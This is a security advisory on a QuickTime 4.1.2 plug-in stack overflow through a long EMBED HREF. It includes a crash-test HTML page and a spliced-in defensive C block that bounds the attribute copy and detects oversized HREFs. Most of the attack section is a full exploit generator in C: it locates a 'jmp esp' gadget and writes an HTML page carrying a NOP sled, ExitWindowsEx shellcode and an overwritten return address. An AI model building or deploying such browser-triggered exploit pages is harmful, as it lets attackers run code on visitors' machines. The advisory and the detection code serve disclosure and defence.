COMMAND
QuickTime
SYSTEMS AFFECTED
QuickTime Player 4.1.2 for Windows (Japanese)
PROBLEM
'UNYUN' (Shadow Penguin Security) found the following. There is an
exploitable buffer overflow in the QuickTime plug-in for Windows.
The problem is triggered when a visitor clicks the movie shown in the
browser. The QuickTime plug-in does not properly check the length of
the HREF parameter of the EMBED tag, so QuickTime overflows when a
long string is supplied in HREF. The overflow overwrites a local
(stack) buffer, and code written into the EMBED tag can then be
executed on the client host.
If an HTML file that carries attack code in its EMBED tag is opened
and the visitor clicks the shown movie, that code is executed on the
client host. This overflow opens the possibility of virus and trojan
infection, system destruction, intrusion, and so on.
We will explain the details of this problem under the environment of
Windows 98 (SE/Japanese) + QuickTime Player 4.1.2 for Windows +
Internet Explorer 5.0. You can check this problem easily with the
following simple HTML file.
<html>
<embed src="c:\program files\quicktime\sample.mov"
href="aaaa... long string (730 characters)"
width=60 height=60 autoplay="true"
target="QUICKTIMEPLAYER">
</html>
* You must prepare a sample movie file to specify in the "src"
parameter.
* Write 730 bytes of characters in the "href" parameter.
Internet Explorer will crash from the buffer overflow when the movie
shown in the browser is clicked. You will see that EIP is 0x61616161
in the GPF dialog box when Internet Explorer crashes.
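Two defensive checks, added here as an example that is not part of the advisory or of Shadow Penguin Security's code: copy_attr_bounded is the bounded attribute copy the plug-in should have performed (it refuses an HREF that does not fit its buffer instead of overrunning it), and count_oversized_embed_href scans a saved or proxy-captured page for EMBED tags whose HREF exceeds a length limit, which is the simplest signature for the crash-test page above. The 255-byte limit, the function names and the constructed sample page with a 730-byte HREF are assumptions made for this example; the advisory does not state the plug-in's actual buffer size.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define HREF_LIMIT 255   /* assumed policy limit; the advisory only says 730 bytes overflow */

/* Case-insensitive comparison of n bytes (HTML attribute names are not case sensitive). */
static int ieq(const char *a, const char *b, size_t n)
{
    while (n--) if (tolower((unsigned char)*a++) != tolower((unsigned char)*b++)) return 0;
    return 1;
}

static size_t skip_ws(const char *s, size_t i, size_t n)
{
    while (i < n && isspace((unsigned char)s[i])) i++;
    return i;
}

/* Tokenise the attributes of one tag (tag[0] == '<', n bytes up to but excluding '>') and
 * locate attribute `name`. Returns a pointer to the value (quotes stripped) and its length
 * in *len, or NULL when absent. Nothing is copied: the caller decides whether it fits. */
static const char *find_attr(const char *tag, size_t n, const char *name, size_t *len)
{
    size_t nlen = strlen(name), i = 0;
    while (i < n && !isspace((unsigned char)tag[i])) i++;            /* skip tag name */
    while ((i = skip_ws(tag, i, n)) < n) {
        size_t nstart = i;
        while (i < n && tag[i] != '=' && !isspace((unsigned char)tag[i])) i++;
        size_t nl = i - nstart, vlen = 0;
        const char *v = NULL;
        if ((i = skip_ws(tag, i, n)) < n && tag[i] == '=') {
            i = skip_ws(tag, i + 1, n);
            char q = (i < n && (tag[i] == '"' || tag[i] == '\'')) ? tag[i++] : 0;
            v = tag + i;
            while (i < n && (q ? tag[i] != q : !isspace((unsigned char)tag[i]))) i++;
            vlen = (size_t)(tag + i - v);
            if (q && i < n) i++;                                      /* closing quote */
        }
        if (v && nl == nlen && ieq(tag + nstart, name, nlen)) { *len = vlen; return v; }
    }
    return NULL;
}

/* The check the plug-in lacked: copy an attribute value only when it fits. Returns 0 with a
 * NUL-terminated value in `out`, or -1 if the attribute is missing or longer than cap-1 bytes. */
int copy_attr_bounded(const char *tag, size_t n, const char *name, char *out, size_t cap)
{
    size_t len;
    const char *v = find_attr(tag, n, name, &len);
    if (v == NULL || cap == 0 || len >= cap) return -1;   /* reject before copying */
    memcpy(out, v, len);
    out[len] = '\0';
    return 0;
}

/* Detection over a whole document: count <embed> tags whose HREF is longer than `limit`. */
int count_oversized_embed_href(const char *html, size_t limit)
{
    int hits = 0;
    const char *p = html, *end;
    while ((p = strchr(p, '<')) != NULL && (end = strchr(p, '>')) != NULL) {
        size_t n = (size_t)(end - p), len;
        if (n > 6 && ieq(p + 1, "embed", 5) && isspace((unsigned char)p[6])
            && find_attr(p, n, "href", &len) != NULL && len > limit)
            hits++;
        p = end + 1;
    }
    return hits;
}

/* Demo wrapper: find the tag starting with `tag_prefix` and attempt a bounded copy of its
 * HREF into a `cap`-byte buffer (at most 1024). Returns -2 if no such tag exists. */
int bounded_href_status(const char *html, const char *tag_prefix, size_t cap)
{
    char out[1024];
    const char *tag = strstr(html, tag_prefix), *end = tag ? strchr(tag, '>') : NULL;
    if (end == NULL) return -2;
    return copy_attr_bounded(tag, (size_t)(end - tag), "href", out, cap < sizeof out ? cap : sizeof out);
}

/* Constructed sample page: one ordinary embed and one whose HREF is 730 bytes of 'a',
 * mirroring the advisory's crash-test page. */
const char *sample_html(void)
{
    static char page[1200];
    char longhref[731];
    memset(longhref, 'a', 730); longhref[730] = '\0';
    snprintf(page, sizeof page,
        "<html>\n<embed src=\"intro.mov\" href=\"http://example.invalid/intro.mov\" width=60 height=60>\n"
        "<embed src=\"sample.mov\" href=\"%s\" width=60 height=60 autoplay=\"true\" target=\"QUICKTIMEPLAYER\">\n"
        "</html>\n", longhref);
    return page;
}

int main(void)
{
    const char *html = sample_html();
    printf("embed tags with HREF over %d bytes: %d\n", HREF_LIMIT, count_oversized_embed_href(html, HREF_LIMIT));
    printf("bounded copy of the 730-byte HREF: %s\n",
           bounded_href_status(html, "<embed src=\"sample.mov\"", HREF_LIMIT + 1) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The tokenizer is deliberately minimal: it does not decode entities and treats the first '>' as the end of the tag even inside a quoted value, so a production filter should sit on a real HTML parser. The point is the order of operations in copy_attr_bounded: the length is compared against the destination buffer before a single byte is copied, which is exactly the check whose absence lets a 730-byte HREF reach the saved return address.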
The C program below generates an HTML file that includes code which
shuts down Windows by calling the ExitWindowsEx API. The shutdown
code is written into the EMBED tag and executed through this buffer
overflow. When you check this problem with the program, you must set
an appropriate movie file in MOV_FILE (the movie file "sample.mov"
named in the code is a sample that is installed by default with
QuickTime Player 4.1.2). The program can be compiled with Visual
C++ 6.0. It was checked under the environment of Windows 98 Second
Edition (Japanese) + Internet Explorer 5.0.
/*====================================================================
 Apple QuickTime 4.1.2 plug-in exploit
 The Shadow Penguin Security (http://shadowpenguin.backsection.net)
 Written by UNYUN (shadowpenguin@backsection.net)
 ====================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define MOV_FILE   "c:\\program files\\quicktime\\sample.mov"
#define HEIGHT     60
#define WIDTH      60
#define TARGET     "QUICKTIMEPLAYER"
#define FILE_IMAGE \
    "<html><embed src=\"%s\" href=\"%s\" "\
    "width=%d height=%d autoplay=\"true\" "\
    "target=\"%s\"><br></html>"
#define BUFSIZE    730          /* length of the HREF value */
#define RET        684          /* offset of the saved return address within HREF */
#define ESP_TGT    "rpcrt4.dll" /* module searched for a "jmp esp" */
#define JMPESP_1   0xff
#define JMPESP_2   0xe4
#define NOP        0x90

/* shutdown code executed via ExitWindowsEx (see text) */
unsigned char exploit_code[200]={
    0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
    0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
    0xFF,0xD0,0x00,
};

int main(int argc,char *argv[])
{
    FILE *fp;
    char buf[BUFSIZE];
    unsigned int i,pretadr,p,ip,kp;
    MEMORY_BASIC_INFORMATION meminfo;

    if (argc<2){
        printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",
               argv[0]);
        exit(1);
    }
    if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
        printf("%s is not found.\n",ESP_TGT);
        exit(1);
    }
    /* search the module for a "jmp esp" whose address contains no NUL byte */
    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
    pretadr=0;
    for (i=0;i<meminfo.RegionSize;i++){
        p=kp+i;
        if ( ( p     &0xff)==0
          || ((p>>8 )&0xff)==0
          || ((p>>16)&0xff)==0
          || ((p>>24)&0xff)==0) continue;
        if ( *((unsigned char *)p)==JMPESP_1
          && *(((unsigned char *)p)+1)==JMPESP_2)
            pretadr=p;
    }
    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("File write error \"%s\"\n",argv[1]);
        exit(1);
    }
    /* build the HREF value: NOP sled, shutdown code, return address at RET */
    memset(buf,NOP,BUFSIZE);
    memcpy(buf+700-12,exploit_code,strlen((char *)exploit_code));
    buf[BUFSIZE-2]=0;
    ip=pretadr;
    printf("EIP=%x\n",ip);
    buf[RET  ]=ip&0xff;
    buf[RET+1]=(ip>>8)&0xff;
    buf[RET+2]=(ip>>16)&0xff;
    buf[RET+3]=(ip>>24)&0xff;
    if (argc==2)
        fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
    else
        fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
    fclose(fp);
    printf("Done.\n");
    return 0;
}
SOLUTION
Disable the execution of ActiveX controls and plug-ins.